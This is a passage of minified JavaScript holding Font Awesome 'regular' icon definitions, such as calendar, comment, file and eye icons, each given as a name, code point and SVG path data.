16.97z"]},faCalendarMinus:{prefix:"far",iconName:"calendar-minus",icon:[448,512,[],"f272","M124 328c-6.6 0-12-5.4-12-12v-24c0-6.6 5.4-12 12-12h200c6.6 0 12 5.4 12 12v24c0 6.6-5.4 12-12 12H124zm324-216v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h48V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h128V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h48c26.5 0 48 21.5 48 48zm-48 346V160H48v298c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCalendarPlus:{prefix:"far",iconName:"calendar-plus",icon:[448,512,[],"f271","M336 292v24c0 6.6-5.4 12-12 12h-76v76c0 6.6-5.4 12-12 12h-24c-6.6 0-12-5.4-12-12v-76h-76c-6.6 0-12-5.4-12-12v-24c0-6.6 5.4-12 12-12h76v-76c0-6.6 5.4-12 12-12h24c6.6 0 12 5.4 12 12v76h76c6.6 0 12 5.4 12 12zm112-180v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h48V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h128V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h48c26.5 0 48 21.5 48 48zm-48 346V160H48v298c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCalendarTimes:{prefix:"far",iconName:"calendar-times",icon:[448,512,[],"f273","M311.7 374.7l-17 17c-4.7 4.7-12.3 4.7-17 0L224 337.9l-53.7 53.7c-4.7 4.7-12.3 4.7-17 0l-17-17c-4.7-4.7-4.7-12.3 0-17l53.7-53.7-53.7-53.7c-4.7-4.7-4.7-12.3 0-17l17-17c4.7-4.7 12.3-4.7 17 0l53.7 53.7 53.7-53.7c4.7-4.7 12.3-4.7 17 0l17 17c4.7 4.7 4.7 12.3 0 17L257.9 304l53.7 53.7c4.8 4.7 4.8 12.3.1 17zM448 112v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h48V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h128V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h48c26.5 0 48 21.5 48 48zm-48 346V160H48v298c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCaretSquareDown:{prefix:"far",iconName:"caret-square-down",icon:[448,512,[],"f150","M125.1 208h197.8c10.7 0 16.1 13 8.5 20.5l-98.9 98.3c-4.7 4.7-12.2 4.7-16.9 0l-98.9-98.3c-7.7-7.5-2.3-20.5 8.4-20.5zM448 80v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V80c0-26.5 21.5-48 48-48h352c26.5 0 48 21.5 48 48zm-48 346V86c0-3.3-2.7-6-6-6H54c-3.3 0-6 2.7-6 6v340c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCaretSquareLeft:{prefix:"far",iconName:"caret-square-left",icon:[448,512,[],"f191","M272 157.1v197.8c0 10.7-13 16.1-20.5 8.5l-98.3-98.9c-4.7-4.7-4.7-12.2 0-16.9l98.3-98.9c7.5-7.7 20.5-2.3 20.5 8.4zM448 80v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V80c0-26.5 21.5-48 48-48h352c26.5 0 48 21.5 48 48zm-48 346V86c0-3.3-2.7-6-6-6H54c-3.3 0-6 2.7-6 6v340c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCaretSquareRight:{prefix:"far",iconName:"caret-square-right",icon:[448,512,[],"f152","M176 354.9V157.1c0-10.7 13-16.1 20.5-8.5l98.3 98.9c4.7 4.7 4.7 12.2 0 16.9l-98.3 98.9c-7.5 7.7-20.5 2.3-20.5-8.4zM448 80v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V80c0-26.5 21.5-48 48-48h352c26.5 0 48 21.5 48 48zm-48 346V86c0-3.3-2.7-6-6-6H54c-3.3 0-6 2.7-6 6v340c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faCaretSquareUp:{prefix:"far",iconName:"caret-square-up",icon:[448,512,[],"f151","M322.9 304H125.1c-10.7 0-16.1-13-8.5-20.5l98.9-98.3c4.7-4.7 12.2-4.7 16.9 0l98.9 98.3c7.7 7.5 2.3 20.5-8.4 20.5zM448 80v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V80c0-26.5 21.5-48 48-48h352c26.5 0 48 21.5 48 48zm-48 346V86c0-3.3-2.7-6-6-6H54c-3.3 0-6 2.7-6 6v340c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faChartBar:{prefix:"far",iconName:"chart-bar",icon:[512,512,[],"f080","M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z"]},faCheckCircle:{prefix:"far",iconName:"check-circle",icon:[512,512,[],"f058","M256 8C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 48c110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200-110.532 0-200-89.451-200-200 0-110.532 89.451-200 200-200m140.204 130.267l-22.536-22.718c-4.667-4.705-12.265-4.736-16.97-.068L215.346 303.697l-59.792-60.277c-4.667-4.705-12.265-4.736-16.97-.069l-22.719 22.536c-4.705 4.667-4.736 12.265-.068 16.971l90.781 91.516c4.667 4.705 12.265 4.736 16.97.068l172.589-171.204c4.704-4.668 4.734-12.266.067-16.971z"]},faCheckSquare:{prefix:"far",iconName:"check-square",icon:[448,512,[],"f14a","M400 32H48C21.49 32 0 53.49 0 80v352c0 26.51 21.49 48 48 48h352c26.51 0 48-21.49 48-48V80c0-26.51-21.49-48-48-48zm0 400H48V80h352v352zm-35.864-241.724L191.547 361.48c-4.705 4.667-12.303 4.637-16.97-.068l-90.781-91.516c-4.667-4.705-4.637-12.303.069-16.971l22.719-22.536c4.705-4.667 12.303-4.637 16.97.069l59.792 60.277 141.352-140.216c4.705-4.667 12.303-4.637 16.97.068l22.536 22.718c4.667 4.706 4.637 12.304-.068 16.971z"]},faCircle:{prefix:"far",iconName:"circle",icon:[512,512,[],"f111","M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200z"]},faClipboard:{prefix:"far",iconName:"clipboard",icon:[384,512,[],"f328","M336 64h-80c0-35.3-28.7-64-64-64s-64 28.7-64 64H48C21.5 64 0 85.5 0 112v352c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V112c0-26.5-21.5-48-48-48zM192 40c13.3 0 24 10.7 24 24s-10.7 24-24 24-24-10.7-24-24 10.7-24 24-24zm144 418c0 3.3-2.7 6-6 6H54c-3.3 0-6-2.7-6-6V118c0-3.3 2.7-6 6-6h42v36c0 6.6 5.4 12 12 12h168c6.6 0 12-5.4 12-12v-36h42c3.3 0 6 2.7 6 6z"]},faClock:{prefix:"far",iconName:"clock",icon:[512,512,[],"f017","M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm61.8-104.4l-84.9-61.7c-3.1-2.3-4.9-5.9-4.9-9.7V116c0-6.6 5.4-12 12-12h32c6.6 0 12 5.4 12 12v141.7l66.8 48.6c5.4 3.9 6.5 11.4 2.6 16.8L334.6 349c-3.9 5.3-11.4 6.5-16.8 2.6z"]},faClone:{prefix:"far",iconName:"clone",icon:[512,512,[],"f24d","M464 0H144c-26.51 0-48 21.49-48 48v48H48c-26.51 0-48 21.49-48 48v320c0 26.51 21.49 48 48 48h320c26.51 0 48-21.49 48-48v-48h48c26.51 0 48-21.49 48-48V48c0-26.51-21.49-48-48-48zM362 464H54a6 6 0 0 1-6-6V150a6 6 0 0 1 6-6h42v224c0 26.51 21.49 48 48 48h224v42a6 6 0 0 1-6 6zm96-96H150a6 6 0 0 1-6-6V54a6 6 0 0 1 6-6h308a6 6 0 0 1 6 6v308a6 6 0 0 1-6 6z"]},faClosedCaptioning:{prefix:"far",iconName:"closed-captioning",icon:[512,512,[],"f20a","M464 64H48C21.5 64 0 85.5 0 112v288c0 26.5 21.5 48 48 48h416c26.5 0 48-21.5 48-48V112c0-26.5-21.5-48-48-48zm-6 336H54c-3.3 0-6-2.7-6-6V118c0-3.3 2.7-6 6-6h404c3.3 0 6 2.7 6 6v276c0 3.3-2.7 6-6 6zm-211.1-85.7c1.7 2.4 1.5 5.6-.5 7.7-53.6 56.8-172.8 32.1-172.8-67.9 0-97.3 121.7-119.5 172.5-70.1 2.1 2 2.5 3.2 1 5.7l-17.5 30.5c-1.9 3.1-6.2 4-9.1 1.7-40.8-32-94.6-14.9-94.6 31.2 0 48 51 70.5 92.2 32.6 2.8-2.5 7.1-2.1 9.2.9l19.6 27.7zm190.4 0c1.7 2.4 1.5 5.6-.5 7.7-53.6 56.9-172.8 32.1-172.8-67.9 0-97.3 121.7-119.5 172.5-70.1 2.1 2 2.5 3.2 1 5.7L420 220.2c-1.9 3.1-6.2 4-9.1 1.7-40.8-32-94.6-14.9-94.6 31.2 0 48 51 70.5 92.2 32.6 2.8-2.5 7.1-2.1 9.2.9l19.6 27.7z"]},faComment:{prefix:"far",iconName:"comment",icon:[512,512,[],"f075","M256 32C114.6 32 0 125.1 0 240c0 47.6 19.9 91.2 52.9 126.3C38 405.7 7 439.1 6.5 439.5c-6.6 7-8.4 17.2-4.6 26S14.4 480 24 480c61.5 0 110-25.7 139.1-46.3C192 442.8 223.2 448 256 448c141.4 0 256-93.1 256-208S397.4 32 256 32zm0 368c-26.7 0-53.1-4.1-78.4-12.1l-22.7-7.2-19.5 13.8c-14.3 10.1-33.9 21.4-57.5 29 7.3-12.1 14.4-25.7 19.9-40.2l10.6-28.1-20.6-21.8C69.7 314.1 48 282.2 48 240c0-88.2 93.3-160 208-160s208 71.8 208 160-93.3 160-208 160z"]},faCommentAlt:{prefix:"far",iconName:"comment-alt",icon:[512,512,[],"f27a","M448 0H64C28.7 0 0 28.7 0 64v288c0 35.3 28.7 64 64 64h96v84c0 7.1 5.8 12 12 12 2.4 0 4.9-.7 7.1-2.4L304 416h144c35.3 0 64-28.7 64-64V64c0-35.3-28.7-64-64-64zm16 352c0 8.8-7.2 16-16 16H288l-12.8 9.6L208 428v-60H64c-8.8 0-16-7.2-16-16V64c0-8.8 7.2-16 16-16h384c8.8 0 16 7.2 16 16v288z"]},faCommentDots:{prefix:"far",iconName:"comment-dots",icon:[512,512,[],"f4ad","M144 208c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm112 0c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm112 0c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zM256 32C114.6 32 0 125.1 0 240c0 47.6 19.9 91.2 52.9 126.3C38 405.7 7 439.1 6.5 439.5c-6.6 7-8.4 17.2-4.6 26S14.4 480 24 480c61.5 0 110-25.7 139.1-46.3C192 442.8 223.2 448 256 448c141.4 0 256-93.1 256-208S397.4 32 256 32zm0 368c-26.7 0-53.1-4.1-78.4-12.1l-22.7-7.2-19.5 13.8c-14.3 10.1-33.9 21.4-57.5 29 7.3-12.1 14.4-25.7 19.9-40.2l10.6-28.1-20.6-21.8C69.7 314.1 48 282.2 48 240c0-88.2 93.3-160 208-160s208 71.8 208 160-93.3 160-208 160z"]},faComments:{prefix:"far",iconName:"comments",icon:[576,512,[],"f086","M532 386.2c27.5-27.1 44-61.1 44-98.2 0-80-76.5-146.1-176.2-157.9C368.3 72.5 294.3 32 208 32 93.1 32 0 103.6 0 192c0 37 16.5 71 44 98.2-15.3 30.7-37.3 54.5-37.7 54.9-6.3 6.7-8.1 16.5-4.4 25 3.6 8.5 12 14 21.2 14 53.5 0 96.7-20.2 125.2-38.8 9.2 2.1 18.7 3.7 28.4 4.9C208.1 407.6 281.8 448 368 448c20.8 0 40.8-2.4 59.8-6.8C456.3 459.7 499.4 480 553 480c9.2 0 17.5-5.5 21.2-14 3.6-8.5 1.9-18.3-4.4-25-.4-.3-22.5-24.1-37.8-54.8zm-392.8-92.3L122.1 305c-14.1 9.1-28.5 16.3-43.1 21.4 2.7-4.7 5.4-9.7 8-14.8l15.5-31.1L77.7 256C64.2 242.6 48 220.7 48 192c0-60.7 73.3-112 160-112s160 51.3 160 112-73.3 112-160 112c-16.5 0-33-1.9-49-5.6l-19.8-4.5zM498.3 352l-24.7 24.4 15.5 31.1c2.6 5.1 5.3 10.1 8 14.8-14.6-5.1-29-12.3-43.1-21.4l-17.1-11.1-19.9 4.6c-16 3.7-32.5 5.6-49 5.6-54 0-102.2-20.1-131.3-49.7C338 339.5 416 272.9 416 192c0-3.4-.4-6.7-.7-10C479.7 196.5 528 238.8 528 288c0 28.7-16.2 50.6-29.7 64z"]},faCompass:{prefix:"far",iconName:"compass",icon:[496,512,[],"f14e","M347.94 129.86L203.6 195.83a31.938 31.938 0 0 0-15.77 15.77l-65.97 144.34c-7.61 16.65 9.54 33.81 26.2 26.2l144.34-65.97a31.938 31.938 0 0 0 15.77-15.77l65.97-144.34c7.61-16.66-9.54-33.81-26.2-26.2zm-77.36 148.72c-12.47 12.47-32.69 12.47-45.16 0-12.47-12.47-12.47-32.69 0-45.16 12.47-12.47 32.69-12.47 45.16 0 12.47 12.47 12.47 32.69 0 45.16zM248 8C111.03 8 0 119.03 0 256s111.03 248 248 248 248-111.03 248-248S384.97 8 248 8zm0 448c-110.28 0-200-89.72-200-200S137.72 56 248 56s200 89.72 200 200-89.72 200-200 200z"]},faCopy:{prefix:"far",iconName:"copy",icon:[448,512,[],"f0c5","M433.941 65.941l-51.882-51.882A48 48 0 0 0 348.118 0H176c-26.51 0-48 21.49-48 48v48H48c-26.51 0-48 21.49-48 48v320c0 26.51 21.49 48 48 48h224c26.51 0 48-21.49 48-48v-48h80c26.51 0 48-21.49 48-48V99.882a48 48 0 0 0-14.059-33.941zM266 464H54a6 6 0 0 1-6-6V150a6 6 0 0 1 6-6h74v224c0 26.51 21.49 48 48 48h96v42a6 6 0 0 1-6 6zm128-96H182a6 6 0 0 1-6-6V54a6 6 0 0 1 6-6h106v88c0 13.255 10.745 24 24 24h88v202a6 6 0 0 1-6 6zm6-256h-64V48h9.632c1.591 0 3.117.632 4.243 1.757l48.368 48.368a6 6 0 0 1 1.757 4.243V112z"]},faCopyright:{prefix:"far",iconName:"copyright",icon:[512,512,[],"f1f9","M256 8C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 448c-110.532 0-200-89.451-200-200 0-110.531 89.451-200 200-200 110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200zm107.351-101.064c-9.614 9.712-45.53 41.396-104.065 41.396-82.43 0-140.484-61.425-140.484-141.567 0-79.152 60.275-139.401 139.762-139.401 55.531 0 88.738 26.62 97.593 34.779a11.965 11.965 0 0 1 1.936 15.322l-18.155 28.113c-3.841 5.95-11.966 7.282-17.499 2.921-8.595-6.776-31.814-22.538-61.708-22.538-48.303 0-77.916 35.33-77.916 80.082 0 41.589 26.888 83.692 78.277 83.692 32.657 0 56.843-19.039 65.726-27.225 5.27-4.857 13.596-4.039 17.82 1.738l19.865 27.17a11.947 11.947 0 0 1-1.152 15.518z"]},faCreditCard:{prefix:"far",iconName:"credit-card",icon:[576,512,[],"f09d","M527.9 32H48.1C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48.1 48h479.8c26.6 0 48.1-21.5 48.1-48V80c0-26.5-21.5-48-48.1-48zM54.1 80h467.8c3.3 0 6 2.7 6 6v42H48.1V86c0-3.3 2.7-6 6-6zm467.8 352H54.1c-3.3 0-6-2.7-6-6V256h479.8v170c0 3.3-2.7 6-6 6zM192 332v40c0 6.6-5.4 12-12 12h-72c-6.6 0-12-5.4-12-12v-40c0-6.6 5.4-12 12-12h72c6.6 0 12 5.4 12 12zm192 0v40c0 6.6-5.4 12-12 12H236c-6.6 0-12-5.4-12-12v-40c0-6.6 5.4-12 12-12h136c6.6 0 12 5.4 12 12z"]},faDizzy:{prefix:"far",iconName:"dizzy",icon:[496,512,[],"f567","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-33.8-217.9c7.8-7.8 7.8-20.5 0-28.3L196.3 192l17.9-17.9c7.8-7.8 7.8-20.5 0-28.3-7.8-7.8-20.5-7.8-28.3 0L168 163.7l-17.8-17.8c-7.8-7.8-20.5-7.8-28.3 0-7.8 7.8-7.8 20.5 0 28.3l17.9 17.9-17.9 17.9c-7.8 7.8-7.8 20.5 0 28.3 7.8 7.8 20.5 7.8 28.3 0l17.8-17.8 17.8 17.8c7.9 7.7 20.5 7.7 28.4-.2zm160-92.2c-7.8-7.8-20.5-7.8-28.3 0L328 163.7l-17.8-17.8c-7.8-7.8-20.5-7.8-28.3 0-7.8 7.8-7.8 20.5 0 28.3l17.9 17.9-17.9 17.9c-7.8 7.8-7.8 20.5 0 28.3 7.8 7.8 20.5 7.8 28.3 0l17.8-17.8 17.8 17.8c7.8 7.8 20.5 7.8 28.3 0 7.8-7.8 7.8-20.5 0-28.3l-17.8-18 17.9-17.9c7.7-7.8 7.7-20.4 0-28.2zM248 272c-35.3 0-64 28.7-64 64s28.7 64 64 64 64-28.7 64-64-28.7-64-64-64z"]},faDotCircle:{prefix:"far",iconName:"dot-circle",icon:[512,512,[],"f192","M256 56c110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200-110.532 0-200-89.451-200-200 0-110.532 89.451-200 200-200m0-48C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 168c-44.183 0-80 35.817-80 80s35.817 80 80 80 80-35.817 80-80-35.817-80-80-80z"]},faEdit:{prefix:"far",iconName:"edit",icon:[576,512,[],"f044","M402.3 344.9l32-32c5-5 13.7-1.5 13.7 5.7V464c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h273.5c7.1 0 10.7 8.6 5.7 13.7l-32 32c-1.5 1.5-3.5 2.3-5.7 2.3H48v352h352V350.5c0-2.1.8-4.1 2.3-5.6zm156.6-201.8L296.3 405.7l-90.4 10c-26.2 2.9-48.5-19.2-45.6-45.6l10-90.4L432.9 17.1c22.9-22.9 59.9-22.9 82.7 0l43.2 43.2c22.9 22.9 22.9 60 .1 82.8zM460.1 174L402 115.9 216.2 301.8l-7.3 65.3 65.3-7.3L460.1 174zm64.8-79.7l-43.2-43.2c-4.1-4.1-10.8-4.1-14.8 0L436 82l58.1 58.1 30.9-30.9c4-4.2 4-10.8-.1-14.9z"]},faEnvelope:{prefix:"far",iconName:"envelope",icon:[512,512,[],"f0e0","M464 64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm0 48v40.805c-22.422 18.259-58.168 46.651-134.587 106.49-16.841 13.247-50.201 45.072-73.413 44.701-23.208.375-56.579-31.459-73.413-44.701C106.18 199.465 70.425 171.067 48 152.805V112h416zM48 400V214.398c22.914 18.251 55.409 43.862 104.938 82.646 21.857 17.205 60.134 55.186 103.062 54.955 42.717.231 80.509-37.199 103.053-54.947 49.528-38.783 82.032-64.401 104.947-82.653V400H48z"]},faEnvelopeOpen:{prefix:"far",iconName:"envelope-open",icon:[512,512,[],"f2b6","M494.586 164.516c-4.697-3.883-111.723-89.95-135.251-108.657C337.231 38.191 299.437 0 256 0c-43.205 0-80.636 37.717-103.335 55.859-24.463 19.45-131.07 105.195-135.15 108.549A48.004 48.004 0 0 0 0 201.485V464c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V201.509a48 48 0 0 0-17.414-36.993zM464 458a6 6 0 0 1-6 6H54a6 6 0 0 1-6-6V204.347c0-1.813.816-3.526 2.226-4.665 15.87-12.814 108.793-87.554 132.364-106.293C200.755 78.88 232.398 48 256 48c23.693 0 55.857 31.369 73.41 45.389 23.573 18.741 116.503 93.493 132.366 106.316a5.99 5.99 0 0 1 2.224 4.663V458zm-31.991-187.704c4.249 5.159 3.465 12.795-1.745 16.981-28.975 23.283-59.274 47.597-70.929 56.863C336.636 362.283 299.205 400 256 400c-43.452 0-81.287-38.237-103.335-55.86-11.279-8.967-41.744-33.413-70.927-56.865-5.21-4.187-5.993-11.822-1.745-16.981l15.258-18.528c4.178-5.073 11.657-5.843 16.779-1.726 28.618 23.001 58.566 47.035 70.56 56.571C200.143 320.631 232.307 352 256 352c23.602 0 55.246-30.88 73.41-45.389 11.994-9.535 41.944-33.57 70.563-56.568 5.122-4.116 12.601-3.346 16.778 1.727l15.258 18.526z"]},faEye:{prefix:"far",iconName:"eye",icon:[576,512,[],"f06e","M288 144a110.94 110.94 0 0 0-31.24 5 55.4 55.4 0 0 1 7.24 27 56 56 0 0 1-56 56 55.4 55.4 0 0 1-27-7.24A111.71 111.71 0 1 0 288 144zm284.52 97.4C518.29 135.59 410.93 64 288 64S57.68 135.64 3.48 241.41a32.35 32.35 0 0 0 0 29.19C57.71 376.41 165.07 448 288 448s230.32-71.64 284.52-177.41a32.35 32.35 0 0 0 0-29.19zM288 400c-98.65 0-189.09-55-237.93-144C98.91 167 189.34 112 288 112s189.09 55 237.93 144C477.1 345 386.66 400 288 400z"]},faEyeSlash:{prefix:"far",iconName:"eye-slash",icon:[640,512,[],"f070","M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"]},faFile:{prefix:"far",iconName:"file",icon:[384,512,[],"f15b","M369.9 97.9L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM332.1 128H256V51.9l76.1 76.1zM48 464V48h160v104c0 13.3 10.7 24 24 24h104v288H48z"]},faFileAlt:{prefix:"far",iconName:"file-alt",icon:[384,512,[],"f15c","M288 248v28c0 6.6-5.4 12-12 12H108c-6.6 0-12-5.4-12-12v-28c0-6.6 5.4-12 12-12h168c6.6 0 12 5.4 12 12zm-12 72H108c-6.6 0-12 5.4-12 12v28c0 6.6 5.4 12 12 12h168c6.6 0 12-5.4 12-12v-28c0-6.6-5.4-12-12-12zm108-188.1V464c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V48C0 21.5 21.5 0 48 0h204.1C264.8 0 277 5.1 286 14.1L369.9 98c9 8.9 14.1 21.2 14.1 33.9zm-128-80V128h76.1L256 51.9zM336 464V176H232c-13.3 0-24-10.7-24-24V48H48v416h288z"]},faFileArchive:{prefix:"far",iconName:"file-archive",icon:[384,512,[],"f1c6","M128.3 160v32h32v-32zm64-96h-32v32h32zm-64 32v32h32V96zm64 32h-32v32h32zm177.6-30.1L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM256 51.9l76.1 76.1H256zM336 464H48V48h79.7v16h32V48H208v104c0 13.3 10.7 24 24 24h104zM194.2 265.7c-1.1-5.6-6-9.7-11.8-9.7h-22.1v-32h-32v32l-19.7 97.1C102 385.6 126.8 416 160 416c33.1 0 57.9-30.2 51.5-62.6zm-33.9 124.4c-17.9 0-32.4-12.1-32.4-27s14.5-27 32.4-27 32.4 12.1 32.4 27-14.5 27-32.4 27zm32-198.1h-32v32h32z"]},faFileAudio:{prefix:"far",iconName:"file-audio",icon:[384,512,[],"f1c7","M369.941 97.941l-83.882-83.882A48 48 0 0 0 252.118 0H48C21.49 0 0 21.49 0 48v416c0 26.51 21.49 48 48 48h288c26.51 0 48-21.49 48-48V131.882a48 48 0 0 0-14.059-33.941zM332.118 128H256V51.882L332.118 128zM48 464V48h160v104c0 13.255 10.745 24 24 24h104v288H48zm144-76.024c0 10.691-12.926 16.045-20.485 8.485L136 360.486h-28c-6.627 0-12-5.373-12-12v-56c0-6.627 5.373-12 12-12h28l35.515-36.947c7.56-7.56 20.485-2.206 20.485 8.485v135.952zm41.201-47.13c9.051-9.297 9.06-24.133.001-33.439-22.149-22.752 12.235-56.246 34.395-33.481 27.198 27.94 27.212 72.444.001 100.401-21.793 22.386-56.947-10.315-34.397-33.481z"]},faFileCode:{prefix:"far",iconName:"file-code",icon:[384,512,[],"f1c9","M149.9 349.1l-.2-.2-32.8-28.9 32.8-28.9c3.6-3.2 4-8.8.8-12.4l-.2-.2-17.4-18.6c-3.4-3.6-9-3.7-12.4-.4l-57.7 54.1c-3.7 3.5-3.7 9.4 0 12.8l57.7 54.1c1.6 1.5 3.8 2.4 6 2.4 2.4 0 4.8-1 6.4-2.8l17.4-18.6c3.3-3.5 3.1-9.1-.4-12.4zm220-251.2L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM256 51.9l76.1 76.1H256zM336 464H48V48h160v104c0 13.3 10.7 24 24 24h104zM209.6 214c-4.7-1.4-9.5 1.3-10.9 6L144 408.1c-1.4 4.7 1.3 9.6 6 10.9l24.4 7.1c4.7 1.4 9.6-1.4 10.9-6L240 231.9c1.4-4.7-1.3-9.6-6-10.9zm24.5 76.9l.2.2 32.8 28.9-32.8 28.9c-3.6 3.2-4 8.8-.8 12.4l.2.2 17.4 18.6c3.3 3.5 8.9 3.7 12.4.4l57.7-54.1c3.7-3.5 3.7-9.4 0-12.8l-57.7-54.1c-3.5-3.3-9.1-3.2-12.4.4l-17.4 18.6c-3.3 3.5-3.1 9.1.4 12.4z"]},faFileExcel:{prefix:"far",iconName:"file-excel",icon:[384,512,[],"f1c3","M369.9 97.9L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM332.1 128H256V51.9l76.1 76.1zM48 464V48h160v104c0 13.3 10.7 24 24 24h104v288H48zm212-240h-28.8c-4.4 0-8.4 2.4-10.5 6.3-18 33.1-22.2 42.4-28.6 57.7-13.9-29.1-6.9-17.3-28.6-57.7-2.1-3.9-6.2-6.3-10.6-6.3H124c-9.3 0-15 10-10.4 18l46.3 78-46.3 78c-4.7 8 1.1 18 10.4 18h28.9c4.4 0 8.4-2.4 10.5-6.3 21.7-40 23-45 28.6-57.7 14.9 30.2 5.9 15.9 28.6 57.7 2.1 3.9 6.2 6.3 10.6 6.3H260c9.3 0 15-10 10.4-18L224 320c.7-1.1 30.3-50.5 46.3-78 4.7-8-1.1-18-10.3-18z"]},faFileImage:{prefix:"far",iconName:"file-image",icon:[384,512,[],"f1c5","M369.9 97.9L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM332.1 128H256V51.9l76.1 76.1zM48 464V48h160v104c0 13.3 10.7 24 24 24h104v288H48zm32-48h224V288l-23.5-23.5c-4.7-4.7-12.3-4.7-17 0L176 352l-39.5-39.5c-4.7-4.7-12.3-4.7-17 0L80 352v64zm48-240c-26.5 0-48 